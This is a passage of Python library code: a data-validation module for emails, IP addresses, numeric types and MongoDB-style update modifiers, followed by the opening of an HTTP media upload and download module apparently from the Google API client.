parts[-1] = parts[-1].encode('idna')
except UnicodeError:
raise excptn
super(EmailValidator, self).__call__(u'@'.join(parts))
else:
raise
EMAIL_RE = re.compile(
r"(^[-!#$%&'*+/=?^_`{}|~0-9A-Z]+"
r"(\.[-!#$%&'*+/=?^_`{}|~0-9A-Z]+)*" # dot-atom
# quoted-string, see also http://tools.ietf.org/html/rfc2822#section-3.2.5
r'|^"([\001-\010\013\014\016-\037!#-\[\]-\177]|'
r'\\[\001-\011\013\014\016-\177])*"'
r')@((?:[A-Z0-9](?:[A-Z0-9-]{0,61}[A-Z0-9])?\.)+[A-Z]{2,6}\.?$)' # domain
r'|\[(25[0-5]|2[0-4]\d|[0-1]?\d?\d)'
r'(\.(25[0-5]|2[0-4]\d|[0-1]?\d?\d)){3}\]$',
re.IGNORECASE) # literal form, ipv4 address (SMTP 4.1.3)
validate_email = EmailValidator(EMAIL_RE,
u'Enter a valid e-mail address.',
'invalid')
slug_re = re.compile(r'^[-\w]+$')
validate_slug = RegexValidator(
slug_re,
u"Enter a valid 'slug' consisting of letters, numbers, "
u"underscores or hyphens.",
'invalid')
ipv4_re = re.compile(r'^(25[0-5]|2[0-4]\d|[0-1]?\d?\d)'
r'(\.(25[0-5]|2[0-4]\d|[0-1]?\d?\d)){3}$')
validate_ipv4_address = RegexValidator(ipv4_re,
'Enter a valid IPv4 address.',
'invalid')
def validate_ipv6_address(value):
"""
Check the validity of an IPv6 address.
"""
if not is_valid_ipv6_address(value):
raise ValidationError('Enter a valid IPv6 address.',
code='invalid')
def validate_ipv46_address(value):
"""
Uses both validate_ipv4_address and validate_ipv6_address
to ensure a value is either a valid IPv4 or IPv6 address.
"""
try:
validate_ipv4_address(value)
except ValidationError:
try:
validate_ipv6_address(value)
except ValidationError:
raise ValidationError(u'Enter a valid IPv4 or IPv6 address.',
code='invalid')
ip_address_validator_map = {
'both': ([validate_ipv46_address],
'Enter a valid IPv4 or IPv6 address.'),
'ipv4': ([validate_ipv4_address],
'Enter a valid IPv4 address.'),
'ipv6': ([validate_ipv6_address],
'Enter a valid IPv6 address.'),
}
def ip_address_validators(protocol, unpack_ipv4):
"""
Depending on the given parameters returns the appropriate validators for
the GenericIPAddressField.
This code is here, because it is exactly the same for the
model and the form field.
"""
if protocol != 'both' and unpack_ipv4:
raise ValueError(
"You can only use `unpack_ipv4` if `protocol` is set to 'both'")
try:
return ip_address_validator_map[protocol.lower()]
except KeyError:
raise ValueError("The protocol '%s' is unknown. Supported: %s"
% (protocol, ip_address_validator_map.keys()))
# A RegexValidator instance that ensures a value is a comma-separated
# list of integers.
comma_separated_int_list_re = re.compile('^[\d,]+$')
validate_comma_separated_integer_list = RegexValidator(
comma_separated_int_list_re,
u'Enter only digits separated by commas.',
'invalid')
class BaseValidator(object):
"""Base class of the validation classes defined below."""
compare = lambda self, a, b: a is not b
clean = lambda self, x: x
message = u'Ensure this value is %(limit_value)s ' \
u'(it is %(show_value)s).'
code = 'limit_value'
def __init__(self, limit_value):
self.limit_value = limit_value
def __call__(self, value):
cleaned = self.clean(value)
params = {'limit_value': self.limit_value, 'show_value': cleaned}
if self.compare(cleaned, self.limit_value):
raise ValidationError(
self.message % params,
code=self.code,
params=params,
)
class MaxValueValidator(BaseValidator):
"""
Raises a ValidationError with a code of 'max_value' if value is
greater than max_value."""
compare = lambda self, a, b: a > b
message = u'Ensure this value is less than or equal to %(limit_value)s.'
code = 'max_value'
class MinValueValidator(BaseValidator):
"""
Raises a ValidationError with a code of 'min_value' if
value is less than min_value.
"""
compare = lambda self, a, b: a < b
message = u'Ensure this value is greater than or ' \
u'equal to %(limit_value)s.'
code = 'min_value'
class MinLengthValidator(BaseValidator):
"""
Raises a ValidationError with a code of 'min_length'
if the length of value is less than min_length.
"""
compare = lambda self, a, b: a < b
clean = lambda self, x: len(x)
message = u'Ensure this value has at least ' \
u'%(limit_value)d characters (it has %(show_value)d).'
code = 'min_length'
class MaxLengthValidator(BaseValidator):
"""
Raises a ValidationError with a code of 'max_length' if the
length of value is greater than max_length.
"""
compare = lambda self, a, b: a > b
clean = lambda self, x: len(x)
message = u'Ensure this value has at most %(limit_value)d ' \
u'characters (it has %(show_value)d).'
code = 'max_length'
def smart_unicode(stringy_thingy,
encoding='utf-8',
strings_only=False,
errors='strict'):
"""
Returns a unicode object representing 'stringy_thingy'.
Treats bytestrings using the 'encoding' codec.
If strings_only is True, don't convert (some) non-string-like objects.
"""
return force_unicode(stringy_thingy, encoding, strings_only, errors)
def smart_str(stringy_thingy,
encoding='utf-8',
strings_only=False,
errors='strict'):
"""
Returns a bytestring version of 'stringy_thingy',
encoded as specified in 'encoding'.
If strings_only is True, don't convert (some) non-string-like objects.
smart_str is essentially the opposite of smart_unicode().
It forces the first argument to a bytestring.
The strings_only parameter has the same behavior as for
smart_unicode() and force_unicode(). This is slightly different
semantics from Python's builtin str() function,
but the difference can be useful.
"""
if strings_only and isinstance(stringy_thingy, (type(None), int)):
return stringy_thingy
if not isinstance(stringy_thingy, basestring):
try:
return str(stringy_thingy)
except UnicodeEncodeError:
if isinstance(stringy_thingy, Exception):
# An Exception subclass containing non-ASCII data that doesn't
# know how to print itself properly. We shouldn't raise a
# further exception.
return ' '.join([smart_str(arg, encoding, strings_only,
errors) for arg in stringy_thingy])
return unicode(stringy_thingy).encode(encoding, errors)
elif isinstance(stringy_thingy, unicode):
return stringy_thingy.encode(encoding, errors)
elif stringy_thingy and encoding != 'utf-8':
return stringy_thingy.decode('utf-8', errors).encode(encoding, errors)
else:
return stringy_thingy
def is_protected_type(obj):
"""Determine if the object instance is of a protected type.
Objects of protected types are preserved as-is when passed to
force_unicode(strings_only=True).
"""
return isinstance(obj, (
type(None),
int, long,
datetime.datetime, datetime.date, datetime.time,
float, Decimal)
)
class WrappedUnicodeDecodeError(UnicodeDecodeError):
"""UnicodeDecodeError wrapped with the obj."""
def __init__(self, obj, *args):
self.obj = obj
UnicodeDecodeError.__init__(self, *args)
def __str__(self):
original = UnicodeDecodeError.__str__(self)
return '%s. You passed in %r (%s)' % (original, self.obj,
type(self.obj))
def force_unicode(stringy_thingy,
encoding='utf-8',
strings_only=False,
errors='strict'):
"""
Similar to smart_unicode, except that lazy instances are resolved to
strings, rather than kept as lazy objects.
If strings_only is True, don't convert (some) non-string-like objects.
"""
# Handle the common case first, saves 30-40% in performance when s
# is an instance of unicode. This function gets called often in that
# setting.
if isinstance(stringy_thingy, unicode):
return stringy_thingy
if strings_only and is_protected_type(stringy_thingy):
return stringy_thingy
try:
if not isinstance(stringy_thingy, basestring,):
if hasattr(stringy_thingy, '__unicode__'):
stringy_thingy = unicode(stringy_thingy)
else:
try:
stringy_thingy = unicode(str(stringy_thingy),
encoding,
errors)
except UnicodeEncodeError:
if not isinstance(stringy_thingy, Exception):
raise
# If we get to here, the caller has passed in an Exception
# subclass populated with non-ASCII data without special
# handling to display as a string. We need to handle this
# without raising a further exception. We do an
# approximation to what the Exception's standard str()
# output should be.
stringy_thingy = u' '.join([force_unicode(arg,
encoding,
strings_only,
errors) for \
arg in stringy_thingy])
elif not isinstance(stringy_thingy, unicode):
# Note: We use .decode() here, instead of unicode(s, encoding,
# errors), so that if s is a SafeString, it ends up being a
# SafeUnicode at the end.
stringy_thingy = stringy_thingy.decode(encoding, errors)
except UnicodeDecodeError as excptn:
if not isinstance(stringy_thingy, Exception):
raise WrappedUnicodeDecodeError(stringy_thingy, *excptn.args)
else:
# If we get to here, the caller has passed in an Exception
# subclass populated with non-ASCII bytestring data without a
# working unicode method. Try to handle this without raising a
# further exception by individually forcing the exception args
# to unicode.
stringy_thingy = u' '.join([force_unicode(arg,
encoding,
strings_only,
errors) for \
arg in stringy_thingy])
return stringy_thingy
# IP Address support
# This code was mostly based on ipaddr-py
# Copyright 2007 Google Inc. http://code.google.com/p/ipaddr-py/
# Licensed under the Apache License, Version 2.0 (the "License").
def clean_ipv6_address(ip_str, unpack_ipv4=False,
error_message="This is not a valid IPv6 address"):
"""
Cleans a IPv6 address string.
Validity is checked by calling is_valid_ipv6_address() - if an
invalid address is passed, ValidationError is raised.
Replaces the longest continious zero-sequence with "::" and
removes leading zeroes and makes sure all hextets are lowercase.
Args:
ip_str: A valid IPv6 address.
unpack_ipv4: if an IPv4-mapped address is found,
return the plain IPv4 address (default=False).
error_message: A error message for in the ValidationError.
Returns:
A compressed IPv6 address, or the same value
"""
best_doublecolon_start = -1
best_doublecolon_len = 0
doublecolon_start = -1
doublecolon_len = 0
if not is_valid_ipv6_address(ip_str):
raise ValidationError(error_message)
# This algorithm can only handle fully exploded
# IP strings
ip_str = _explode_shorthand_ip_string(ip_str)
ip_str = _sanitize_ipv4_mapping(ip_str)
# If needed, unpack the IPv4 and return straight away
# - no need in running the rest of the algorithm
if unpack_ipv4:
ipv4_unpacked = _unpack_ipv4(ip_str)
if ipv4_unpacked:
return ipv4_unpacked
hextets = ip_str.split(":")
for index in range(len(hextets)):
# Remove leading zeroes
hextets[index] = hextets[index].lstrip('0')
if not hextets[index]:
hextets[index] = '0'
# Determine best hextet to compress
if hextets[index] == '0':
doublecolon_len += 1
if doublecolon_start == -1:
# Start of a sequence of zeros.
doublecolon_start = index
if doublecolon_len > best_doublecolon_len:
# This is the longest sequence of zeros so far.
best_doublecolon_len = doublecolon_len
best_doublecolon_start = doublecolon_start
else:
doublecolon_len = 0
doublecolon_start = -1
# Compress the most suitable hextet
if best_doublecolon_len > 1:
best_doublecolon_end = (best_doublecolon_start +
best_doublecolon_len)
# For zeros at the end of the address.
if best_doublecolon_end == len(hextets):
hextets += ['']
hextets[best_doublecolon_start:best_doublecolon_end] = ['']
# For zeros at the beginning of the address.
if best_doublecolon_start == 0:
hextets = [''] + hextets
result = ":".join(hextets)
return result.lower()
def _sanitize_ipv4_mapping(ip_str):
"""
Sanitize IPv4 mapping in a expanded IPv6 address.
This converts ::ffff:0a0a:0a0a to ::ffff:10.10.10.10.
If there is nothing to sanitize, returns an unchanged
string.
Args:
ip_str: A string, the expanded IPv6 address.
Returns:
The sanitized output string, if applicable.
"""
if not ip_str.lower().startswith('0000:0000:0000:0000:0000:ffff:'):
# not an ipv4 mapping
return ip_str
hextets = ip_str.split(':')
if '.' in hextets[-1]:
# already sanitized
return ip_str
ipv4_address = "%d.%d.%d.%d" % (
int(hextets[6][0:2], 16),
int(hextets[6][2:4], 16),
int(hextets[7][0:2], 16),
int(hextets[7][2:4], 16),
)
result = ':'.join(hextets[0:6])
result += ':' + ipv4_address
return result
def _unpack_ipv4(ip_str):
"""
Unpack an IPv4 address that was mapped in a compressed IPv6 address.
This converts 0000:0000:0000:0000:0000:ffff:10.10.10.10 to 10.10.10.10.
If there is nothing to sanitize, returns None.
Args:
ip_str: A string, the expanded IPv6 address.
Returns:
The unpacked IPv4 address, or None if there was nothing to unpack.
"""
if not ip_str.lower().startswith('0000:0000:0000:0000:0000:ffff:'):
return None
hextets = ip_str.split(':')
return hextets[-1]
def is_valid_ipv6_address(ip_str):
"""
Ensure we have a valid IPv6 address.
Args:
ip_str: A string, the IPv6 address.
Returns:
A boolean, True if this is a valid IPv6 address.
"""
# We need to have at least one ':'.
if ':' not in ip_str:
return False
# We can only have one '::' shortener.
if ip_str.count('::') > 1:
return False
# '::' should be encompassed by start, digits or end.
if ':::' in ip_str:
return False
# A single colon can neither start nor end an address.
if ((ip_str.startswith(':') and not ip_str.startswith('::')) or
(ip_str.endswith(':') and not ip_str.endswith('::'))):
return False
# We can never have more than 7 ':' (1::2:3:4:5:6:7:8 is invalid)
if ip_str.count(':') > 7:
return False
# If we have no concatenation, we need to have 8 fields with 7 ':'.
if '::' not in ip_str and ip_str.count(':') != 7:
# We might have an IPv4 mapped address.
if ip_str.count('.') != 3:
return False
ip_str = _explode_shorthand_ip_string(ip_str)
# Now that we have that all squared away, let's check that each of the
# hextets are between 0x0 and 0xFFFF.
for hextet in ip_str.split(':'):
if hextet.count('.') == 3:
# If we have an IPv4 mapped address, the IPv4 portion has to
# be at the end of the IPv6 portion.
if not ip_str.split(':')[-1] == hextet:
return False
try:
validate_ipv4_address(hextet)
except ValidationError:
return False
else:
try:
# a value error here means that we got a bad hextet,
# something like 0xzzzz
if int(hextet, 16) < 0x0 or int(hextet, 16) > 0xFFFF:
return False
except ValueError:
return False
return True
def _explode_shorthand_ip_string(ip_str):
"""
Expand a shortened IPv6 address.
Args:
ip_str: A string, the IPv6 address.
Returns:
A string, the expanded IPv6 address.
"""
if not _is_shorthand_ip(ip_str):
# We've already got a longhand ip_str.
return ip_str
new_ip = []
hextet = ip_str.split('::')
# If there is a ::, we need to expand it with zeroes
# to get to 8 hextets - unless there is a dot in the last hextet,
# meaning we're doing v4-mapping
if '.' in ip_str.split(':')[-1]:
fill_to = 7
else:
fill_to = 8
if len(hextet) > 1:
sep = len(hextet[0].split(':')) + len(hextet[1].split(':'))
new_ip = hextet[0].split(':')
for _ in range(fill_to - sep):
new_ip.append('0000')
new_ip += hextet[1].split(':')
else:
new_ip = ip_str.split(':')
# Now need to make sure every hextet is 4 lower case characters.
# If a hextet is < 4 characters, we've got missing leading 0's.
ret_ip = []
for hextet in new_ip:
ret_ip.append(('0' * (4 - len(hextet)) + hextet).lower())
return ':'.join(ret_ip)
def _is_shorthand_ip(ip_str):
"""Determine if the address is shortened.
Args:
ip_str: A string, the IPv6 address
Returns:
A boolean, True if the address is shortened.
"""
if ip_str.count('::') == 1:
return True
if list(filter(lambda x: len(x) < 4, ip_str.split(':'))):
return True
return False
def validate_bool(data):
"""If the data is True or False."""
if not isinstance(data, bool):
raise ValidationError("Not a bool.")
def validate_long(data):
"""If the data is (or can become) a long
i.e. a 64 bit integer."""
try:
long(data)
except (ValueError, TypeError):
raise ValidationError('Not a long')
def validate_char(data):
"""
A string field, for small-to medium-sized strings.
TODO: this will have to become a method to implement limit.
"""
if not isinstance(data, basestring):
raise ValidationError("%s is not a char." % data)
def validate_date(data):
"""Validate a date."""
if not isinstance(data, datetime.date):
raise ValidationError("Not a date.")
def validate_datetime(data):
"""Validate a datetime."""
if not isinstance(data, datetime.datetime):
raise ValidationError("Not a datetime.")
def validate_decimal(data):
"""Validate a decimal."""
if not isinstance(data, Decimal):
raise ValidationError("Not a decimal.")
def validate_filepath(data):
"""A the moment,
this just checks that it is a string."""
if not isinstance(data, basestring):
raise ValidationError("Not a filepath.")
def validate_float(data):
"""Function to be written here."""
if not isinstance(data, float):
raise ValidationError("Not a float.")
def validate_integer(value):
"""Ensure a value is an integer."""
try:
int(value)
except (ValueError, TypeError):
raise ValidationError('Not an Integer.')
def validate_nullboolean(data):
"""If the data is True or False or None."""
if not isinstance(data, bool):
if not isinstance(data, type(None)):
raise ValidationError("Not a nullboolean.")
def validate_postiveinteger(data):
"""Ensure a value is a postive integer."""
try:
valid_int = int(data)
except (ValueError, TypeError):
raise ValidationError('Not a positive integer.')
else:
if valid_int < 0:
raise ValidationError('Postive integer cannot be negative.')
def validate_smallinteger(data):
"""Integer between -32768 to +32767."""
try:
if not -32768 <= int(data) <= 32767:
raise ValidationError('Not a small integer.')
except (ValueError, TypeError):
raise ValidationError('Not a small integer.')
def validate_biginteger(data):
"""Big (8 byte) integer."""
try:
if not -9223372036854775808 <= int(data) <= 9223372036854775807:
raise ValidationError('Not a big integer.')
except (ValueError, TypeError):
raise ValidationError('Not a big integer.')
def validate_positivesmallinteger(data):
"""Function to be written here."""
try:
if not 0 <= int(data) <= 32767:
raise ValidationError('Not a positive small integer.')
except (ValueError, TypeError):
raise ValidationError('Not a positive small integer.')
def validate_text(data):
"""Text of unlimited size."""
if not isinstance(data, basestring):
raise ValidationError("Not a char.")
def validate_time(data):
"""Validate a time."""
if not isinstance(data, datetime.time):
raise ValidationError("Not a time.")
def validate_url(data):
"""Validates a valid URL."""
urlval = URLValidator()
urlval(data)
def validate_verified_url(data):
"""Validates a valid and existing URL.
Read the warnings above."""
urlval = URLValidator(verify_exists=True)
urlval(data)
def validate_xml(data):
"""See if data is well formed XML.
This is pretty leniant.
It also does not check for validity against a DTD or schema.
"""
parser = xml.parsers.expat.ParserCreate()
try:
parser.Parse(data)
except xml.parsers.expat.ExpatError:
raise ValidationError("Not well formed.")
def validate_dict(data):
"""Very simple check that data is a well format dict."""
try:
data.keys()
except AttributeError:
raise ValidationError('Not an dict.')
def validate_list(data):
"""Check list is a list.
"""
try:
data.insert
except AttributeError:
raise ValidationError('Not a list.')
def validate_file(data):
"""Function to be written here."""
raise NotImplementedError(data)
def validate_image(data):
"""Function to be written here."""
raise NotImplementedError(data)
def validate_embedded(data,
embedded_models,
handle_none=False):
"""Check that embedded data validates."""
try:
model = embedded_models[data['_model']]
except KeyError:
raise ValidationError('Missing _model key on embedded data.')
validate_model_instance(model,
data,
handle_none=handle_none,
embedded_models=embedded_models)
def validate_embedded_list(data,
embedded_models,
handle_none=False):
"""Check that all the embedded data in the list validates."""
try:
data.insert
except AttributeError:
raise ValidationError('Not an embedded list.')
for embedded_model in data:
try:
model = embedded_models[embedded_model['_model']]
except KeyError:
raise ValidationError('Missing _model key on embedded data.')
validate_model_instance(model,
embedded_model,
handle_none=handle_none,
embedded_models=embedded_models)
def validate_set_modifier(model_validator, model, field, field_type, value):
"""Sets field to value. All datatypes are supported with $set."""
model_validator.validate_field(field_type, value)
def validate_unset_modifier(model_validator, model, field, field_type, value):
"""Deletes a given field."""
if not 'required' in model[field]:
raise ValidationError(
'Field %s cannot be unset because it is required.' % field,
code='invalid')
if model[field]['required'] != False:
raise ValidationError(
'Field %s cannot be unset because it is required.' % field,
code='invalid')
def validate_inc_modifier(model_validator, model, field, field_type, value):
"""increments field by the number value if field is present
in the object, otherwise sets field to the number value.
This can also be used to decrement by using a negative value."""
# We need to check that the target can be incremented, and that
#the value is sensible
if not isinstance(value, Number):
raise ValidationError(
'Cannot increment by value '
'%s because it is not a number.' % value,
code='invalid')
if field_type not in (
'BigInteger', 'Decimal', 'Float', 'Integer', 'LongInteger',
'PositiveInteger', 'PositiveSmallInteger', 'SmallInteger'):
raise ValidationError(
'Cannot increment field %s'
'because it is not a numeric type.' % field,
code='invalid')
if field_type in (
'PositiveInteger', 'PositiveSmallInteger'):
model_validator.validate_field(
field_type, abs(value))
else:
model_validator.validate_field(
field_type, abs(value))
def validate_array_modifier(model_validator, model, field, field_type, value):
"""Several modifiers for dealing with lists."""
if field_type not in ('EmbeddedList', 'List'):
raise ValidationError(
'Field %s is not a list type.' % field,
code='invalid')
def validate_rename_modifier(model_validator, model, field, field_type, value):
"""Renames the field with name 'old_field_name' to 'new_field_name'"""
raise ValidationError(
'Rename is currently not supported.',
code='invalid')
def validate_bitwise_modifier(model_validator, model, field, field_type, value):
"""Does a bitwise update of field. Can only be used with integers."""
if field_type not in (
'BigInteger', 'Integer', 'LongInteger',
'PositiveInteger', 'PositiveSmallInteger', 'SmallInteger'):
raise ValidationError(
'Field %s is not an integer type.' % field,
code='invalid')
MODIFICATION_DISPATCHER = {
'$set': validate_set_modifier,
'$unset': validate_unset_modifier,
'$inc': validate_inc_modifier,
'$push': validate_array_modifier,
'$pushAll': validate_array_modifier,
'$addToSet': validate_array_modifier,
'$each': validate_array_modifier,
'$pop': validate_array_modifier,
'$pull': validate_array_modifier,
'$pullAll': validate_array_modifier,
'$rename': validate_rename_modifier,
'$bit': validate_bitwise_modifier
}
DISPATCHER = (
('Boolean', validate_bool),
('BigInteger', validate_biginteger),
('Char', validate_char),
('CommaSeparatedInteger', validate_comma_separated_integer_list),
('Date', validate_date),
('DateTime', validate_datetime),
('Decimal', validate_decimal),
('Dict', validate_dict),
('Email', validate_email),
('Embedded', validate_embedded),
('EmbeddedList', validate_embedded_list),
('File', validate_file),
('FilePath', validate_filepath),
('Float', validate_float),
('Image', validate_image),
('Integer', validate_integer),
('IPAddress', validate_ipv46_address),
('IP4Address', validate_ipv4_address),
('IP6Address', validate_ipv6_address),
('List', validate_list),
('LongInteger', validate_long),
('NullBoolean', validate_nullboolean),
('PositiveInteger', validate_postiveinteger),
('PositiveSmallInteger', validate_positivesmallinteger),
('Slug', validate_slug),
('SmallInteger', validate_smallinteger),
('Text', validate_text),
('Time', validate_time),
('URL', validate_url),
('VerifiedURL', validate_verified_url),
('XML', validate_xml),
)
|
# Copyright (C) 2012 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Classes to encapsulate a single HTTP request.
The classes implement a command pattern, with every
object supporting an execute() method that does the
actuall HTTP request.
"""
__author__ = 'jcgregorio@google.com (Joe Gregorio)'
import StringIO
import base64
import copy
import gzip
import httplib2
import mimeparse
import mimetypes
import os
import urllib
import urlparse
import uuid
from email.generator import Generator
from email.mime.multipart import MIMEMultipart
from email.mime.nonmultipart import MIMENonMultipart
from email.parser import FeedParser
from errors import BatchError
from errors import HttpError
from errors import ResumableUploadError
from errors import UnexpectedBodyError
from errors import UnexpectedMethodError
from model import JsonModel
from oauth2client.anyjson import simplejson
DEFAULT_CHUNK_SIZE = 512*1024
class MediaUploadProgress(object):
"""Status of a resumable upload."""
def __init__(self, resumable_progress, total_size):
"""Constructor.
Args:
resumable_progress: int, bytes sent so far.
total_size: int, total bytes in complete upload, or None if the total
upload size isn't known ahead of time.
"""
self.resumable_progress = resumable_progress
self.total_size = total_size
def progress(self):
"""Percent of upload completed, as a float.
Returns:
the percentage complete as a float, returning 0.0 if the total size of
the upload is unknown.
"""
if self.total_size is not None:
return float(self.resumable_progress) / float(self.total_size)
else:
return 0.0
class MediaDownloadProgress(object):
"""Status of a resumable download."""
def __init__(self, resumable_progress, total_size):
"""Constructor.
Args:
resumable_progress: int, bytes received so far.
total_size: int, total bytes in complete download.
"""
self.resumable_progress = resumable_progress
self.total_size = total_size
def progress(self):
"""Percent of download completed, as a float.
Returns:
the percentage complete as a float, returning 0.0 if the total size of
the download is unknown.
"""
if self.total_size is not None:
return float(self.resumable_progress) / float(self.total_size)
else:
return 0.0
class MediaUpload(object):
"""Describes a media object to upload.
Base class that defines the interface of MediaUpload subclasses.
Note that subclasses of MediaUpload may allow you to control the chunksize
when upload a media object. It is important to keep the size of the chunk as
large as possible to keep the upload efficient. Other factors may influence
the size of the chunk you use, particularly if you are working in an
environment where individual HTTP requests may have a hardcoded time limit,
such as under certain classes of requests under Google App Engine.
"""
def chunksize(self):
"""Chunk size for resumable uploads.
Returns:
Chunk size in bytes.
"""
raise NotImplementedError()
def mimetype(self):
"""Mime type of the body.
Returns:
Mime type.
"""
return 'application/octet-stream'
def size(self):
"""Size of upload.
Returns:
Size of the body, or None of the size is unknown.
"""
return None
def resumable(self):
"""Whether this upload is resumable.
Returns:
True if resumable upload or False.
"""
return False
def getbytes(self, begin, end):
"""Get bytes from the media.
Args:
begin: int, offset from beginning of file.
length: int, number of bytes to read, starting at begin.
Returns:
A string of bytes read. May be shorter than length if EOF was reached
first.
"""
raise NotImplementedError()
def _to_json(self, strip=None):
"""Utility function for creating a JSON representation of a MediaUpload.
Args:
strip: array, An array of names of members to not include in the JSON.
Returns:
string, a JSON representation of this instance, suitable to pass to
from_json().
"""
t = type(self)
d = copy.copy(self.__dict__)
if strip is not None:
for member in strip:
del d[member]
d['_class'] = t.__name__
d['_module'] = t.__module__
return simplejson.dumps(d)
def to_json(self):
"""Create a JSON representation of an instance of MediaUpload.
Returns:
string, a JSON representation of this instance, suitable to pass to
from_json().
"""
return self._to_json()
@classmethod
def new_from_json(cls, s):
"""Utility class method to instantiate a MediaUpload subclass from a JSON
representation produced by to_json().
Args:
s: string, JSON from to_json().
Returns:
An instance of the subclass of MediaUpload that was serialized with
to_json().
"""
data = simplejson.loads(s)
# Find and call the right classmethod from_json() to restore the object.
module = data['_module']
m = __import__(module, fromlist=module.split('.')[:-1])
kls = getattr(m, data['_class'])
from_json = getattr(kls, 'from_json')
return from_json(s)
class MediaFileUpload(MediaUpload):
"""A MediaUpload for a file.
Construct a MediaFileUpload and pass as the media_body parameter of the
method. For example, if we had a service that allowed uploading images:
media = MediaFileUpload('cow.png', mimetype='image/png',
chunksize=1024*1024, resumable=True)
farm.animals()..insert(
id='cow',
name='cow.png',
media_body=media).execute()
"""
def __init__(self, filename, mimetype=None, chunksize=DEFAULT_CHUNK_SIZE, resumable=False):
"""Constructor.
Args:
filename: string, Name of the file.
mimetype: string, Mime-type of the file. If None then a mime-type will be
guessed from the file extension.
chunksize: int, File will be uploaded in chunks of this many bytes. Only
used if resumable=True.
resumable: bool, True if this is a resumable upload. False means upload
in a single request.
"""
self._filename = filename
self._size = os.path.getsize(filename)
self._fd = None
if mimetype is None:
(mimetype, encoding) = mimetypes.guess_type(filename)
self._mimetype = mimetype
self._chunksize = chunksize
self._resumable = resumable
def chunksize(self):
"""Chunk size for resumable uploads.
Returns:
Chunk size in bytes.
"""
return self._chunksize
def mimetype(self):
"""Mime type of the body.
Returns:
Mime type.
"""
return self._mimetype
def size(self):
"""Size of upload.
Returns:
Size of the body, or None of the size is unknown.
"""
return self._size
def resumable(self):
"""Whether this upload is resumable.
Returns:
True if resumable upload or False.
"""
return self._resumable
def getbytes(self, begin, length):
"""Get bytes from the media.
Args:
begin: int, offset from beginning of file.
length: int, number of bytes to read, starting at begin.
Returns:
A string of bytes read. May be shorted than length if EOF was reached
first.
"""
if self._fd is None:
self._fd = open(self._filename, 'rb')
self._fd.seek(begin)
return self._fd.read(length)
def to_json(self):
"""Creating a JSON representation of an instance of MediaFileUpload.
Returns:
string, a JSON representation of this instance, suitable to pass to
from_json().
"""
return self._to_json(['_fd'])
@staticmethod
def from_json(s):
d = simplejson.loads(s)
return MediaFileUpload(
d['_filename'], d['_mimetype'], d['_chunksize'], d['_resumable'])
class MediaIoBaseUpload(MediaUpload):
"""A MediaUpload for a io.Base objects.
Note that the Python file object is compatible with io.Base and can be used
with this class also.
fh = io.BytesIO('...Some data to upload...')
media = MediaIoBaseUpload(fh, mimetype='image/png',
chunksize=1024*1024, resumable=True)
farm.animals().insert(
id='cow',
name='cow.png',
media_body=media).execute()
"""
def __init__(self, fd, mimetype, chunksize=DEFAULT_CHUNK_SIZE,
resumable=False):
"""Constructor.
Args:
fd: io.Base or file object, The source of the bytes to upload. MUST be
opened in blocking mode, do not use streams opened in non-blocking mode.
mimetype: string, Mime-type of the file. If None then a mime-type will be
guessed from the file extension.
chunksize: int, File will be uploaded in chunks of this many bytes. Only
used if resumable=True.
resumable: bool, True if this is a resumable upload. False means upload
in a single request.
"""
self._fd = fd
self._mimetype = mimetype
self._chunksize = chunksize
self._resumable = resumable
self._size = None
try:
if hasattr(self._fd, 'fileno'):
fileno = self._fd.fileno()
# Pipes and such show up as 0 length files.
size = os.fstat(fileno).st_size
if size:
self._size = os.fstat(fileno).st_size
except IOError:
pass
def chunksize(self):
"""Chunk size for resumable uploads.
Returns:
Chunk size in bytes.
"""
return self._chunksize
def mimetype(self):
"""Mime type of the body.
Returns:
Mime type.
"""
return self._mimetype
def size(self):
"""Size of upload.
Returns:
Size of the body, or None of the size is unknown.
"""
return self._size
def resumable(self):
"""Whether this upload is resumable.
Returns:
True if resumable upload or False.
"""
return self._resumable
def getbytes(self, begin, length):
"""Get bytes from the media.
Args:
begin: int, offset from beginning of file.
length: int, number of bytes to read, starting at begin.
Returns:
A string of bytes read. May be shorted than length if EOF was reached
first.
"""
self._fd.seek(begin)
return self._fd.read(length)
def to_json(self):
"""This upload type is not serializable."""
raise NotImplementedError('MediaIoBaseUpload is not serializable.')
class MediaInMemoryUpload(MediaUpload):
"""MediaUpload for a chunk of bytes.
Construct a MediaFileUpload and pass as the media_body parameter of the
method.
"""
def __init__(self, body, mimetype='application/octet-stream',
chunksize=DEFAULT_CHUNK_SIZE, resumable=False):
"""Create a new MediaBytesUpload.
Args:
body: string, Bytes of body content.
mimetype: string, Mime-type of the file or default of
'application/octet-stream'.
chunksize: int, File will be uploaded in chunks of this many bytes. Only
used if resumable=True.
resumable: bool, True if this is a resumable upload. False means upload
in a single request.
"""
self._body = body
self._mimetype = mimetype
self._resumable = resumable
self._chunksize = chunksize
def chunksize(self):
"""Chunk size for resumable uploads.
Returns:
Chunk size in bytes.
"""
return self._chunksize
def mimetype(self):
"""Mime type of the body.
Returns:
Mime type.
"""
return self._mimetype
def size(self):
"""Size of upload.
Returns:
Size of the body, or None of the size is unknown.
"""
return len(self._body)
def resumable(self):
"""Whether this upload is resumable.
Returns:
True if resumable upload or False.
"""
return self._resumable
def getbytes(self, begin, length):
"""Get bytes from the media.
Args:
begin: int, offset from beginning of file.
length: int, number of bytes to read, starting at begin.
Returns:
A string of bytes read. May be shorter than length if EOF was reached
first.
"""
return self._body[begin:begin + length]
def to_json(self):
"""Create a JSON representation of a MediaInMemoryUpload.
Returns:
string, a JSON representation of this instance, suitable to pass to
from_json().
"""
t = type(self)
d = copy.copy(self.__dict__)
del d['_body']
d['_class'] = t.__name__
d['_module'] = t.__module__
d['_b64body'] = base64.b64encode(self._body)
return simplejson.dumps(d)
@staticmethod
def from_json(s):
d = simplejson.loads(s)
return MediaInMemoryUpload(base64.b64decode(d['_b64body']),
d['_mimetype'], d['_chunksize'],
d['_resumable'])
class MediaIoBaseDownload(object):
""""Download media resources.
Note that the Python file object is compatible with io.Base and can be used
with this class also.
Example:
request = farms.animals().get_media(id='cow')
fh = io.FileIO('cow.png', mode='wb')
downloader = MediaIoBaseDownload(fh, request, chunksize=1024*1024)
done = False
while done is False:
status, done = downloader.next_chunk()
if status:
